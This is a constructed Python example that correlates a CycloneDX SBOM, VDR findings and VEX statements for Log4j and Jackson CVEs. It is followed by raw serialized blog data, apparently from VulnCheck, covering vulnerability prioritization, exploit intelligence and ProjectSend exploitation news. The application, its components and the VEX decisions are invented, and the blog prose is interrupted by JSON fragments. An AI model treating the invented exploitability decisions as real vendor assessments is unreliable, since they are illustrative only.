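The Log4j scenario from "Bringing It All Together", worked in code as an added example (not VulnCheck's code, nor any CycloneDX project code): it walks a CycloneDX SBOM's `dependencies` graph to show where a vulnerable component sits, joins the VDR findings to VEX analysis states, and leaves only the findings that still need action. All three documents are constructed for this example: the billing application, its components and the VEX decisions are invented, while CVE-2021-44228, CVE-2021-45046 and CVE-2020-36518 are real CVEs affecting the listed library versions; the ratings are illustrative and the `action` mapping is this example's own convention.

```python
"""Correlate a CycloneDX SBOM, a VDR vulnerability list and VEX statements.

Added example, not VulnCheck's code nor any CycloneDX project code. The three
documents are CONSTRUCTED (parsed-JSON dicts in CycloneDX 1.5 layout): a
billing application whose logging starter pulls in log4j-core 2.14.1, a VDR
naming CVE-2021-44228, CVE-2021-45046 and CVE-2020-36518, and VEX statements
in the CycloneDX `analysis.state` vocabulary. Ratings and VEX decisions are
illustrative, not published vendor assessments.
"""

APP = "pkg:maven/example/billing-app@3.2.0"
STARTER = "pkg:maven/org.springframework.boot/spring-boot-starter-log4j2@2.5.6"
LOG4J = "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"
JACKSON = "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.12.3"

SBOM = {
    "bomFormat": "CycloneDX", "specVersion": "1.5",
    "metadata": {"component": {"type": "application", "bom-ref": APP,
                               "name": "billing-app", "version": "3.2.0"}},
    "components": [
        {"type": "library", "bom-ref": STARTER, "purl": STARTER,
         "name": "spring-boot-starter-log4j2", "version": "2.5.6"},
        {"type": "library", "bom-ref": LOG4J, "purl": LOG4J, "name": "log4j-core", "version": "2.14.1"},
        {"type": "library", "bom-ref": JACKSON, "purl": JACKSON, "name": "jackson-databind", "version": "2.12.3"},
    ],
    "dependencies": [
        {"ref": APP, "dependsOn": [STARTER, JACKSON]},
        {"ref": STARTER, "dependsOn": [LOG4J]},   # log4j-core is only reachable transitively
    ],
}

# VDR: what is known to be vulnerable (CycloneDX "vulnerabilities" array shape).
VDR = [
    {"id": "CVE-2021-44228", "ratings": [{"method": "CVSSv31", "score": 10.0, "severity": "critical"}],
     "affects": [{"ref": LOG4J}]},
    {"id": "CVE-2021-45046", "ratings": [{"method": "CVSSv31", "score": 9.0, "severity": "critical"}],
     "affects": [{"ref": LOG4J}]},
    {"id": "CVE-2020-36518", "ratings": [{"method": "CVSSv31", "score": 7.5, "severity": "high"}],
     "affects": [{"ref": JACKSON}]},
]

# VEX: whether each finding is exploitable in THIS product (constructed decisions).
VEX = [
    {"id": "CVE-2021-44228", "affects": [{"ref": LOG4J}],
     "analysis": {"state": "exploitable",
                  "detail": "user-controlled strings reach log calls; JNDI lookups enabled"}},
    {"id": "CVE-2021-45046", "affects": [{"ref": LOG4J}],
     "analysis": {"state": "not_affected", "justification": "code_not_reachable",
                  "detail": "pattern layout uses no context (${ctx:...}) lookups"}},
    # No statement for CVE-2020-36518: it is still in triage.
]

# This example's own convention for turning a VEX state into work.
ACTION_FOR_STATE = {
    "exploitable": "remediate", "in_triage": "triage",
    "not_affected": "none", "false_positive": "none",
    "resolved": "none", "resolved_with_pedigree": "none",
}


def component_names(sbom):
    """bom-ref -> display name for the root component and every listed component."""
    root = sbom["metadata"]["component"]
    names = {root["bom-ref"]: root["name"]}
    names.update({c["bom-ref"]: c["name"] for c in sbom["components"]})
    return names


def dependency_path(sbom, target):
    """Depth-first walk of the `dependencies` graph from the root component.
    Returns the first path of names reaching `target`, or None when the target
    is never depended on (an orphan entry in `components`)."""
    edges = {d["ref"]: d.get("dependsOn", []) for d in sbom.get("dependencies", [])}
    names = component_names(sbom)
    root = sbom["metadata"]["component"]["bom-ref"]
    stack, seen = [(root, [root])], set()
    while stack:
        ref, path = stack.pop()
        if ref == target:
            return [names.get(r, r) for r in path]
        if ref in seen:
            continue
        seen.add(ref)
        for child in edges.get(ref, []):
            stack.append((child, path + [child]))
    return None


def correlate(sbom, vdr, vex):
    """Join VDR findings to SBOM components and VEX decisions. A VDR entry for a
    component absent from the SBOM is dropped; a finding with no VEX statement
    is treated as `in_triage`, never silently as not affected."""
    present = {c["bom-ref"] for c in sbom["components"]}
    names = component_names(sbom)
    statements = {(v["id"], a["ref"]): v["analysis"] for v in vex for a in v["affects"]}
    findings = []
    for vuln in vdr:
        score = max((r.get("score", 0.0) for r in vuln.get("ratings", [])), default=0.0)
        for affected in vuln["affects"]:
            ref = affected["ref"]
            if ref not in present:
                continue
            analysis = statements.get((vuln["id"], ref), {"state": "in_triage"})
            state = analysis["state"]
            findings.append({
                "id": vuln["id"], "component": names[ref], "path": dependency_path(sbom, ref),
                "score": score, "state": state, "justification": analysis.get("justification"),
                "action": ACTION_FOR_STATE.get(state, "triage"),
            })
    return findings


def actionable(findings):
    """Findings still needing work: exploitable first, then by CVSS score."""
    rank = {"remediate": 0, "triage": 1}
    todo = [f for f in findings if f["action"] != "none"]
    return sorted(todo, key=lambda f: (rank[f["action"]], -f["score"]))


if __name__ == "__main__":
    for f in actionable(correlate(SBOM, VDR, VEX)):
        where = " -> ".join(f["path"] or ["(not in dependency graph)"])
        print(f"{f['action']:9} {f['id']}  {where}  ({f['state']}, CVSS {f['score']})")
```

Run directly it prints two lines: CVE-2021-44228 to remediate, located via billing-app -> spring-boot-starter-log4j2 -> log4j-core, and CVE-2020-36518 to triage; CVE-2021-45046 is dropped from the work list because the VEX statement says the vulnerable code path is not reached. The point of keeping unmatched findings as `in_triage` is that silence in a VEX document is not a "not affected" claim.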
By adopting and integrating these formats into their vulnerability management workflows, organizations can strengthen their security posture, reduce risk, and build resilience against ever-evolving threats.",[44317,60495],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":60497},[60498,60499,60500,60501,60502],{"id":60424,"depth":220,"text":60425},{"id":60431,"depth":220,"text":60432},{"id":60444,"depth":220,"text":60445},{"id":60454,"depth":220,"text":60455},{"id":60464,"depth":220,"text":60465},"Exploit Intel 101 - Vulnerability Exchange Formats (CycloneDX, SPDX, VDR, and VEX)",{"slug":60505},"vulnerability-exchange-formats","\u002Fblog\u002Fvulnerability-exchange-formats",{"title":60411,"description":60503},{"title":41489,"color":41490,"icon":41491},"blog\u002Fvulnerability-exchange-formats",[41494],"0sIjSJ00xL_lzBkcDPMLwrPcKFjuN8V8vg7h2lflOrE",{"id":60513,"title":60514,"articles":7,"authors":60515,"body":60517,"date":60252,"description":60703,"extension":234,"image":7,"link":7,"meta":60704,"navigation":237,"path":60706,"seo":60707,"series":60708,"stem":60709,"subtype":7,"tags":60710,"__hash__":60711},"blog\u002Fblog\u002Fvulnerability-prioritization-101.md","Vulnerability Prioritization",[60516],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":60518,"toc":60701},[60519,60522,60525,60533,60567,60570,60573,60631,60639,60665,60673,60676,60696,60699],[18,60520,60521],{},"Organizations face ever-growing numbers of security vulnerabilities, driven by the explosion in applications, increasing number of security researchers, and threat actor activity. Defenders often face a backlog of hundreds of thousands of known vulnerabilities; attempting to address all of these vulnerabilities is inefficient, expensive, and can lead to fatigue within security teams. 
Smart organizations must make strategic decisions about which vulnerabilities to patch today, which can wait for tomorrow, and what might be deferred indefinitely.",[18,60523,60524],{},"In practice only 2-5% of known vulnerabilities are ever exploited by attackers. By focusing on high-risk vulnerabilities, those most likely to be exploited and with the greatest potential impact, organizations can minimize their exposure to attacks while also making the best use of available resources. Effective Vulnerability Prioritization improves overall security while also optimizing resource allocation, allowing security teams to handle the most significant threats efficiently.",[18,60526,60527,60530,60532],{},[295,60528,60529],{},"What factors affect Vulnerability Prioritization?",[1823,60531],{},"\nWhen assessing risk of any particular vulnerability there are multiple factors to consider  that impact risk, including inherent characteristics of the vulnerability itself, external factors such as threat attacker activity, and other factors such as internet exposure of the vulnerability, mitigating security controls and patching cadence. Some of the most impactful factors include:",[22,60534,60535,60541,60547,60552,60555,60561],{},[25,60536,60537,60540],{},[295,60538,60539],{},"Known Exploited Vulnerabilities (KEV)."," A Known Exploited Vulnerability is a one with confirmed exploitation evidence. Depending on the asset context, these should be treated with urgency and remediated as soon as possible.. The importance of remediating Known Exploited Vulnerabilities is underscored by CISA’s BOD 22-01, which mandates federal agencies address such vulnerabilities. CISA states, “Known exploited vulnerabilities should be the top priority for remediation.”",[25,60542,60543,60546],{},[295,60544,60545],{},"Ransomware Campaigns",". 
Vulnerabilities used in ransomware campaigns are often prioritized due to their widespread impact.",[25,60548,60549,60551],{},[295,60550,44260],{},", Vulnerabilities exploited by botnets, a collection of infected computers controlled by a common attacker, are critical to address.",[25,60553,60554],{},"Threat Actors: Specific vulnerabilities exploited by known threat actors pose increased risks and should be prioritized.",[25,60556,60557,60560],{},[295,60558,60559],{},"Weaponized Vulnerabilities."," Weaponized vulnerabilities are those with explicit malicious intent or reported exploitation. These include exploits within malware or those facilitating easy exploitation (Projects such as: MetaSploit, VulnCheck IAI, CANVAS, Core Impact). Weaponized exploits often have secondary payloads, droppers, or implants.",[25,60562,60563,60566],{},[295,60564,60565],{},"Proof of Concept (POC) exploit code"," demonstrates exploitation and indicates risk. POC exploits, such as blog posts, curl requests, or Python scripts, are often used in real-world attacks. The number of POC exploits associated with a vulnerability correlates with its likelihood of being weaponized or exploited.",[18,60568,60569],{},"There are additional factors to consider. Incorporating these factors within decision-based frameworks like Stakeholder-Specific Vulnerability Categorization (SSVC) can help build decision based logic for prioritizing vulnerabilities. Often, vulnerability attributes beyond threat intelligence can help provide further visibility into the risk a vulnerability might pose. Attributes such as CVSS metrics, CAPEC, CWE, MITRE ATT&CK, threat actors, targeted industries, targeted countries, and categorizations are frequently used by VulnCheck customers to determine the risk a vulnerability poses within their environment.",[18,60571,60572],{},"Beyond exploitation evidence, consider asking the following questions: Is the device\u002Fapplication connected to the internet? 
Is the device\u002Fapplication used for initial access? Is the device\u002Fapplication controlled by a user and susceptible to phishing attacks? Is the vulnerability remotely exploitable? Is the vulnerability automatable? Is the vulnerability reachable? Are there mitigations in place for the vulnerability?",[22,60574,60575,60584,60593,60599,60605],{},[25,60576,60577,60580,60581,60583],{},[295,60578,60579],{},"Known exploit availability and maturity."," Vulnerabilities with known exploits represent a much more immediate risk than vulnerabilities that have not been exploited, and deserve higher prioritization. However, not all exploits are created equal. It’s critical not only to know if an exploit exists, but also to capture its overall maturity. A proof-of-concept circulated by a security researcher is a good warning that the vulnerability could be weaponized by future attackers, but does not itself represent an immediate existential threat. On the other hand, exploits that are known to be circulating in widely available exploit kits or dark forums pose more significant risks. These known exploits increase the urgency for patching, as they provide low-skill adversaries with packaged tools needed in order to exploit vulnerabilities.",[1823,60582],{},"Insights on known exploits can be found in a variety of locations, such as CISA’s Known Exploited Vulnerabilities (KEV) list and Exploit-DB. Unfortunately these sources are often incomplete or lag behind real-world activity. As a result, many security teams augment these lists with their own independent research in order to ensure they have all the intelligence they need in order to prioritize effectively every hour of every day.",[25,60585,60586,60589,60590,60592],{},[295,60587,60588],{},"Vulnerability severity",". Severity is often the first consideration in prioritization. 
Typically based on Common Vulnerability Scoring System (CVSS) scores, severity provides a starting point, categorizing vulnerabilities from low to critical on a scale of 1-10.",[1823,60591],{},"CVSS scores are a core part of every CVE record, and while essential, CVSS alone does not provide enough context for effective prioritization. CVSS scores provide an indication of the potential risk associated with a vulnerability, but do not capture real world risk, as they don’t account for an organization’s specific environment or the likelihood of active exploitation. CVSS temporal scoring can offer an adjustment to a vulnerability’s score based on threat intelligence enrichment.",[25,60594,60595,60598],{},[295,60596,60597],{},"Likelihood of exploitation",".\nThe Exploit Prediction Scoring System (EPSS) is a framework designed to estimate the likelihood of a vulnerability being exploited in the wild. It combines various factors, such as the characteristics of vulnerabilities and historical exploit data to produce a probabilistic exploitability score.",[25,60600,60601,60604],{},[295,60602,60603],{},"Asset value and criticality."," Not all systems are equal in importance. Prioritization should account for the value and criticality of the assets affected by a vulnerability. For example, a vulnerability in a public-facing, mission-critical server warrants more immediate attention than one in a low-risk environment. Vulnerabilities on assets accessed by a large number of users, especially those with elevated privileges, can be higher risk. User roles and access privileges are also taken into account when vulnerabilities impact assets managed by privileged users or critical infrastructure administrators. 
Asset-based prioritization ensures the organization’s most valuable resources are protected.",[25,60606,60607,60610,60611],{},[295,60608,60609],{},"Environmental factors."," Finally, a wide variety of factors related to the local environment can have a significant impact on the risk of a damaging exploit impacting an organization:",[22,60612,60613,60619,60625],{},[25,60614,60615,60618],{},[295,60616,60617],{},"Exposure",". Vulnerabilities on systems exposed to the internet or public networks are often prioritized over those on internal-only assets, as they are more exposed to attack by external threat actors, and could more easily become a vector for initial access.",[25,60620,60621,60624],{},[295,60622,60623],{},"Network segmentation."," Vulnerabilities in isolated segments of the network may be deprioritized if there are additional security layers or isolation.",[25,60626,60627,60630],{},[295,60628,60629],{},"Mitigating controls",". Layered security controls, such as restrictive firewall rules or application allowlisting, can limit exposure, meaning that vulnerabilities on protected systems may be ranked lower risk.",[18,60632,60633,60636,60638],{},[295,60634,60635],{},"Challenges in Vulnerability Prioritization",[1823,60637],{},"\nEven in a perfect world, the wide variety of variables makes Vulnerability Prioritization a daunting task. Unfortunately, the world is far from perfect. A number of challenges make it difficult to put theory into real-world practice:",[22,60640,60641,60647,60653,60659],{},[25,60642,60643,60646],{},[295,60644,60645],{},"Publishing delays."," Public sources of vulnerability data such as the National Vulnerability Database (NVD) and CISA’s Known Exploited Vulnerabilities (KEV) catalog are essential resources, yet they frequently face delays in publishing information. 
This lag can leave organizations unaware of newly discovered vulnerabilities or exploits, potentially leaving them exposed for days or longer.",[25,60648,60649,60652],{},[295,60650,60651],{},"Data gaps",": Public resources often lack key pieces of data on vulnerabilities. Some vulnerabilities have incomplete descriptions, miss important links to external resources, have outdated severity metrics, or do not include up-to-date exploit information, which complicates prioritization efforts.",[25,60654,60655,60658],{},[295,60656,60657],{},"Escalating and evolving threats",": Threat actors continually adapt their tactics, leveraging new vulnerabilities as soon as they’re weaponized. This constantly changing landscape means that a vulnerability’s risk level can increase unexpectedly, particularly when an exploit becomes widely available.",[25,60660,60661,60664],{},[295,60662,60663],{},"Poor usability",": Many sources of vulnerability intelligence are highly technical and complex, requiring expert interpretation. Furthermore, siloed or difficult-to-integrate data makes it tricky to apply this intelligence in real-time, leaving organizations reliant on manual analysis or outdated threat data.",[18,60666,60667,60670,60672],{},[295,60668,60669],{},"The Importance of Exploit Intelligence in Vulnerability Prioritization",[1823,60671],{},"\nGiven these challenges, high-quality exploit intelligence is invaluable in effective vulnerability prioritization. 
Exploit intelligence provides critical insights that help organizations assess the likelihood of exploitation, anticipate attack trends, and respond proactively to threats.",[18,60674,60675],{},"Effective exploit intelligence provides defenders with:",[22,60677,60678,60684,60690],{},[25,60679,60680,60683],{},[295,60681,60682],{},"Up-to-date information",": For effective prioritization, security teams require real-time, accurate data on exploit activity, including proof-of-concepts, in-the-wild usage, and tools leveraging specific vulnerabilities. Up-to-date exploit intelligence allows teams to respond before a vulnerability becomes widely exploited, keeping them a step ahead of attackers.",[25,60685,60686,60689],{},[295,60687,60688],{},"Complete data sets",": Comprehensive intelligence goes beyond merely identifying vulnerabilities. It includes critical context on how vulnerabilities can be exploited, attacker motivations, and even the geographical or industry targets of specific campaigns. This depth enables security teams to prioritize based on the actual risks rather than theoretical threats.",[25,60691,60692,60695],{},[295,60693,60694],{},"Seamless integration with vulnerability management workflows",": Exploit intelligence must integrate smoothly into existing workflows to be effective. Security teams benefit from open APIs and standardized data formats that can be integrated directly in their vulnerability management tools, allowing for automated alerting, reporting, and prioritization within their environment. Easy integration reduces the risk of oversight and improves operational efficiency.",[18,60697,60698],{},"With high volumes of complex vulnerabilities, exploit intelligence is key to effective vulnerability management. 
Security teams armed with up-to-date, tightly integrated, and comprehensive data can make faster, better-informed decisions, protect their high-value assets, and ultimately stay one step ahead of emerging threats.",[44317,60700],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":60702},[],"Exploit Intel 101 - Vulnerability Prioritization",{"slug":60705},"vulnerability-prioritization-101","\u002Fblog\u002Fvulnerability-prioritization-101",{"title":60514,"description":60703},{"title":41489,"color":41490,"icon":41491},"blog\u002Fvulnerability-prioritization-101",[41494],"0LGZfGc-lU6DLBvcXvGRX67Qy1FJrel7MSjogst63TA",{"id":60713,"title":42306,"articles":7,"authors":60714,"body":60716,"date":60910,"description":60911,"extension":234,"image":7,"link":7,"meta":60912,"navigation":237,"path":60914,"seo":60915,"series":60916,"stem":60917,"subtype":7,"tags":60918,"__hash__":60919},"blog\u002Fblog\u002Fexploit-intelligence.md",[60715],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":60717,"toc":60903},[60718,60721,60724,60738,60741,60747,60750,60755,60758,60761,60764,60781,60784,60790,60793,60825,60831,60834,60865,60871,60874,60894,60898,60901],[18,60719,60720],{},"In order to stay ahead of today’s emerging threats, it’s critical that defenders have a clear picture of the vulnerabilities present in their environment, and work diligently to close these gaps before an adversary can take advantage of the exposure.",[18,60722,60723],{},"While it sounds simple, the scale of the problem makes it a monumental challenge for most organizations - because fundamentally exploitation happens faster than remediation:",[22,60725,60726,60732],{},[25,60727,60728,60731],{},[295,60729,60730],{},"The number of known vulnerabilities is increasing rapidly",". 
MITRE’s CVE program has more than 250K vulnerabilities, and is on pace to add more than 25K every year.",[25,60733,60734,60737],{},[295,60735,60736],{},"The time to weaponize a vulnerability is shrinking just as fast."," Today, attackers weaponize vulnerabilities in 8 days or less. Five years ago, it took 1 year on average.",[18,60739,60740],{},"In this environment security teams need to go beyond simple vulnerability management in order to stay ahead of attackers. Exploit Intelligence provides the critical insights that security teams need in order to prioritize and act before a damaging breach.",[993,60742,60744],{"id":60743},"what-is-exploit-intelligence",[295,60745,60746],{},"What is Exploit Intelligence?",[18,60748,60749],{},"Fortunately, the news is not all bad for defenders. While the number of vulnerabilities is high, the number that are actually exploited in the wild is quite low. In practice, while security teams may face tens of thousands of known vulnerabilities, only 2-3% of disclosed vulnerabilities are exploited or likely to be exploited. 
If we can correctly identify that 2%, the effort needed to remediate is slashed dramatically, and the balance swings back in the defender’s favor.",[18,60751,60752],{},[295,60753,60754],{},"Exploit Intelligence offers actionable insights into which vulnerabilities are being actively exploited, or are likely to be soon, and how organizations can prioritize their defenses accordingly.",[18,60756,60757],{},"Unlike traditional vulnerability management, which focuses on cataloging software flaws, Exploit Intelligence helps narrow the scope to those vulnerabilities that pose the most immediate and active threat to your environment.",[18,60759,60760],{},"This intelligence is gathered from multiple sources, such as threat actor behavior, exploit kits, public as well as underground forums, and real-world attacks, giving security teams the necessary context to understand which vulnerabilities are being used as attack vectors at any given moment. With Exploit Intelligence, organizations can move beyond just knowing which software is flawed and take steps to prioritize remediation based on real-world exploitation activity.",[18,60762,60763],{},"Exploit Intelligence helps technical buyers answer key questions such as:",[22,60765,60766,60771,60776],{},[25,60767,60768],{},[295,60769,60770],{},"Which vulnerabilities are being actively exploited by attackers?",[25,60772,60773],{},[295,60774,60775],{},"Which vulnerabilities are likely to be exploited in the near future?",[25,60777,60778],{},[295,60779,60780],{},"Which patches should be prioritized to mitigate the greatest risk?",[18,60782,60783],{},"Exploit Intelligence provides critical decision-making support, enabling organizations to focus their resources where they matter most.",[993,60785,60787],{"id":60786},"how-does-exploit-intelligence-work-with-vulnerability-intelligence",[295,60788,60789],{},"How Does Exploit Intelligence Work With Vulnerability Intelligence?",[18,60791,60792],{},"Vulnerability Intelligence provides raw 
information about weaknesses in software or hardware systems, but it doesn’t provide sufficient information to allow security teams to understand the potential real-world impact. Exploit Intelligence augments and enriches vulnerability data with key contextual information, such as:",[22,60794,60795,60801,60807,60813,60819],{},[25,60796,60797,60800],{},[295,60798,60799],{},"Exploit Availability"," - A vulnerability with a known exploit available in the wild introduces more risk to an environment than one without any known exploits, and deserves higher prioritization.",[25,60802,60803,60806],{},[295,60804,60805],{},"Exploit Maturity"," - Not all exploits are created equal. There is a big difference between a theoretical proof-of-concept exploit described by a researcher vs. an exploit that has been weaponized in a common malware or exploit framework.",[25,60808,60809,60812],{},[295,60810,60811],{},"Exploit Type"," - Exploits can allow an adversary to achieve a wide range of goals, from gaining initial access to a system remotely, to leaking sensitive information from a target, to causing a crash of a service or application.",[25,60814,60815,60818],{},[295,60816,60817],{},"Exploitation Timelines"," - Understanding the evolution of exploits associated with a vulnerability can help defenders predict how it will impact their systems in the future.",[25,60820,60821,60824],{},[295,60822,60823],{},"Threat intelligence"," - Exploit intelligence links vulnerabilities to known threats, including ransomware families, botnets, and named threat actors, allowing security teams to see the bigger picture and understand how exploits fit into an adversary’s broader goals and tactics.",[993,60826,60828],{"id":60827},"what-are-some-practical-applications-of-exploit-intelligence",[295,60829,60830],{},"What Are Some Practical Applications of Exploit Intelligence?",[18,60832,60833],{},"Exploit Intelligence can be applied across several key areas within an organization's cybersecurity 
operations. Here are some practical ways in which it improves security outcomes:",[1789,60835,60836,60841,60847,60853,60859],{},[25,60837,60838,60840],{},[295,60839,60514],{},": Generalized vulnerability scores such as CVSS don’t provide enough context to reduce mountains of vulnerabilities into a manageable amount of work. Exploit Intelligence enriches the process with real world insights, ensuring that the most pressing vulnerabilities are addressed first.",[25,60842,60843,60846],{},[295,60844,60845],{},"Early Warning",": Exploit Intelligence can provide security teams with real-time notifications on vulnerabilities in their devices or software being exploited in the wild by threat actors, or new exploit PoCs affecting their devices or supply chain.",[25,60848,60849,60852],{},[295,60850,60851],{},"Threat Hunting",": Armed with knowledge of potential exploits, threat hunters can proactively search for signs of compromise in their environment, identify potential attack vectors, and improve defenses before attacks occur.",[25,60854,60855,60858],{},[295,60856,60857],{},"Patch Management",": Traditional patch management strategies often focus on the base severity of a vulnerability, but this can leave organizations exposed to lower-severity exploits that are actively being used in the wild. By integrating Exploit Intelligence into the patch management process, security teams can better allocate resources and reduce exposure to active threats.",[25,60860,60861,60864],{},[295,60862,60863],{},"Incident Response",": In the event of a security incident, Exploit Intelligence can help responders to quickly develop a more complete picture of the breach. 
Understanding how the incident began, what threat actors are tied to the relevant TTPs, and what other tactics they are likely to employ helps security teams to respond more quickly and effectively, minimizing the potential for additional damage.",[993,60866,60868],{"id":60867},"features-of-a-strong-exploit-intelligence-solution",[295,60869,60870],{},"Features of a Strong Exploit Intelligence Solution",[18,60872,60873],{},"For organizations evaluating Exploit Intelligence solutions, it's important to understand what makes a platform effective. Here are some key features to look for:",[22,60875,60876,60882,60888],{},[25,60877,60878,60881],{},[295,60879,60880],{},"Breadth of Data Sources",": A strong Exploit Intelligence platform should pull data from a wide range of sources, including threat actor activity, exploit kits, dark web forums, and real-time attack data in order to provide the most comprehensive intelligence possible.",[25,60883,60884,60887],{},[295,60885,60886],{},"Timeliness",": It can take days or even weeks for basic vulnerability data to be updated on well-known public feeds such as NIST NVD and CISA KEV. Real-time data is critical in Exploit Intelligence. The ability to detect and report on exploits as they emerge gives security teams the edge they need to stay ahead of accelerating attacks.",[25,60889,60890,60893],{},[295,60891,60892],{},"Integration with Existing Security Tools",": By itself, Exploit Intelligence is just data; it’s only useful when it’s helping to enrich and accelerate workflows in the SOC. Exploit Intelligence should seamlessly integrate with other security tools, such as vulnerability management systems, SIEMs, and SOC platforms. 
This enables security teams to correlate exploit data with existing alerts and data, making the intelligence actionable.",[993,60895,60896],{"id":1902},[295,60897,1903],{},[18,60899,60900],{},"Exploit Intelligence is a critical tool for organizations who need to prioritize their defenses against real-world threats. By focusing on vulnerabilities that are actively being exploited, organizations can make informed decisions about where to focus their efforts, optimize their remediation efforts, and quickly improve their security posture.",[44317,60902],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":60904},[60905,60906,60907,60908,60909],{"id":60743,"depth":1266,"text":60746},{"id":60786,"depth":1266,"text":60789},{"id":60827,"depth":1266,"text":60830},{"id":60867,"depth":1266,"text":60870},{"id":1902,"depth":1266,"text":1903},"2024-12-02","Exploit Intel 101 - Exploit Intelligence and the Role of Threat Actor Intelligence in Cybersecurity Products",{"slug":60913},"exploit-intelligence","\u002Fblog\u002Fexploit-intelligence",{"title":42306,"description":60911},{"title":41489,"color":41490,"icon":41491},"blog\u002Fexploit-intelligence",[41494],"obO6MrR7drIfevfQfPD9egSWqsxI5XCHUwSRYFagqw4",{"id":60921,"title":36637,"articles":60922,"authors":60968,"body":60970,"date":61400,"description":61401,"extension":234,"image":7,"link":7,"meta":61402,"navigation":237,"path":61404,"seo":61405,"series":7,"stem":61406,"subtype":7,"tags":61407,"__hash__":61408},"blog\u002Fblog\u002Fprojectsend-exploited-itw.md",[60923,60927,60930,60933,60937,60941,60944,60949,60952,60955,60958,60962,60965],{"title":60924,"source":14373,"link":60925,"date":60926},"Hackers exploit ProjectSend flaw to backdoor exposed servers","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-exploit-projectsend-flaw-to-backdoor-exposed-servers\u002F","2024-11-27",{"title":60928,"source":14386,"link":60929,"date":60926},"Hackers Exploiting ProjectSend Authentication 
Vulnerability In The Wild","https:\u002F\u002Fcybersecuritynews.com\u002Fprojectsend-authentication-vulnerability\u002F#google_vignette",{"title":60931,"source":3495,"link":60932,"date":60926},"Risky Biz News: Banshee Stealer shuts down after source code leak","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-banshee-stealer-shuts-down-after-source-code-leak\u002F",{"title":60934,"source":60935,"link":60936,"date":60926},"CVE Created for 18 Month-Old Flaw","SC Media UK","https:\u002F\u002Finsight.scmagazineuk.com\u002Fcve-created-for-18-month-old-flaw",{"title":60938,"source":60939,"link":60940,"date":60926},"ProjectSend Vulnerability Exploited in the Wild","Security Week","https:\u002F\u002Fwww.securityweek.com\u002Fprojectsend-vulnerability-exploited-in-the-wild\u002F",{"title":60942,"source":14382,"link":60943,"date":60926},"Critical Flaw in ProjectSend Under Active Exploitation Against Public-Facing Servers","https:\u002F\u002Fthehackernews.com\u002F2024\u002F11\u002Fcritical-flaw-in-projectsend-under.html",{"title":60945,"source":60946,"link":60947,"date":60948},"Jetzt patchen! 
Attacken auf Filesharingplattform ProjectSend beobachtet","Heise","https:\u002F\u002Fwww.heise.de\u002Fnews\u002FJetzt-patchen-Attacken-auf-Filesharingplattform-ProjectSend-beobachtet-10181736.html","2024-11-28",{"title":60950,"source":57680,"link":60951,"date":60948},"Malicious Actors Exploit ProjectSend Critical Vulnerability","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fexploit-projectsend-critical\u002F",{"title":60953,"source":37266,"link":60954,"date":60948},"Researchers sound alarm over hackers exploiting critical ProjectSend vulnerability","https:\u002F\u002Fwww.itpro.com\u002Fsecurity\u002Fcyber-crime\u002Fresearchers-sound-alarm-over-hackers-exploiting-critical-projectsend-vulnerability",{"title":60956,"source":14390,"link":60957,"date":60948},"ProjectSend critical flaw actively exploited in the wild, experts warn","https:\u002F\u002Fsecurityaffairs.com\u002F171494\u002Fhacking\u002Fprojectsend-critical-flaw-actively-exploited.html",{"title":60959,"source":60960,"link":60961,"date":60948},"ProjectSend security flaws hit to access background servers","TechRadar","https:\u002F\u002Fwww.techradar.com\u002Fpro\u002Fsecurity\u002Fprojectsend-security-flaws-hit-to-access-background-servers",{"title":60963,"source":60960,"link":60964,"date":60086},"Zyxel, ProjectSend, CyberPanel vulnerabilities actively exploited, so patch now","https:\u002F\u002Fwww.techradar.com\u002Fpro\u002Fsecurity\u002Fzyxel-projectsend-cyberpanel-vulnerabilities-actively-exploited-so-patch-now",{"title":60966,"source":14382,"link":60967,"date":60086},"CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and 
CyberPanel","https:\u002F\u002Fthehackernews.com\u002F2024\u002F12\u002Fcisa-warns-of-active-exploitation-of.html",[60969],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":60971,"toc":61393},[60972,60975,61020,61024,61028,61032,61039,61045,61048,61051,61100,61103,61281,61284,61290,61301,61307,61310,61316,61319,61329,61335,61341,61345,61350,61358,61361,61363,61366,61368,61379,61390],[263,60973],{":list":60974,"ico":266,"title":36637},"[\"Public-facing ProjectSend instances appear to have been exploited by attackers.\",\"99% of ProjectSend instances remain vulnerable and have not upgraded to the patched version released in August.\",\"Public exploits have pre-dated CVE assignment by months, including Nuclei templates and a weaponized Metasploit module.\"]",[18,60976,60977,60982,60983,60987,60988,60992,60993,60997,60998,1246,61003,61008,61009,61013,61014,61019],{},[47,60978,60981],{"href":60979,"rel":60980},"https:\u002F\u002Fwww.projectsend.org\u002F",[51],"ProjectSend"," is an open-source file-sharing web application. The project is moderately popular, with almost 1,500 ",[47,60984,2485],{"href":60985,"rel":60986},"https:\u002F\u002Fgithub.com\u002Fprojectsend\u002Fprojectsend",[51]," stars and more than 4,000 instances indexed by ",[47,60989,55030],{"href":60990,"rel":60991},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=same_service%28services.http.response.html_title%3A%22Log+In+%26raquo%3B+%22+and+services.banner%3A%22Set-Cookie%3A+PHPSESSID%22+and+services.http.response.body%3A%22ckeditor.js%22+and+services.http.response.body%3A%22jquery-migrate.min.js%22%29",[51],". 
